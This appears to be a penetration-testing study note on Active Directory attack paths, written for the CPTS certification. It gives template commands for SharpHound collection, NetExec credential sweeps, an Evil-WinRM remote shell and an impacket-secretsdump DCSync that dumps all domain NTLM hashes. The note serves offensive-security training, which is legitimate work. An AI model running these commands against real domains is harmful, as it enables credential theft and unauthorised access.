Active Directory Attack Paths & Domain Enumeration
Domain mapping and attack path analysis using SharpHound, BloodHound, NetExec, and Impacket secretsdump.
bloodhoundsharphoundpowerviewnetexecimpacket
Active Directory environments rely on complex trust relationships, ACL permissions, and Kerberos delegation.
1. BloodHound / SharpHound Telemetry
Collect all domain objects, groups, sessions, and ACLs:
.\SharpHound.exe -c All,GPOLocalGroup --zipfilename htb_ad.zip
2. NetExec (CrackMapExec) Domain Sweep
Verify credentials and locate administrative access across subnets:
nxc smb {TARGET_IP} -u {USER} -p "{PASSWORD}" --shares
3. Remote PowerShell with Evil-WinRM
evil-winrm -i {TARGET_IP} -u {USER} -p "{PASSWORD}" -s /opt/scripts
4. DCSync Credential Extraction
Dump all NTLM password hashes directly over RPC:
impacket-secretsdump {DOMAIN}/{USER}:{PASSWORD}@{TARGET_IP} -just-dc-ntlm
Combine domain enumeration with 07. Kerberos Exploitation: AS-REP & Kerberoasting and 08. Active Directory Certificate Services (AD CS) Abuse.
More CPTS notes
- 01. Network Discovery & Port Scanning Guide
- 02. Web Content Discovery & Directory Fuzzing
- 03. Web Application Exploitation & Injection
- 04. Linux Privilege Escalation Master Guide
- 05. Windows Local Privilege Escalation & LOLBAS
- 07. Kerberos Exploitation: AS-REP & Kerberoasting
- 08. Active Directory Certificate Services (AD CS) Abuse
- 09. Pivoting, Tunnels & Lateral Movement
- 10. Password Cracking & Hash Identification
- 11. Offensive File Transfers Across Restricted Networks
- 12. Interactive TTY Stabilization & Terminal Spawning
Keep these notes in your own private vault. Open CPTS notes in ZeroBox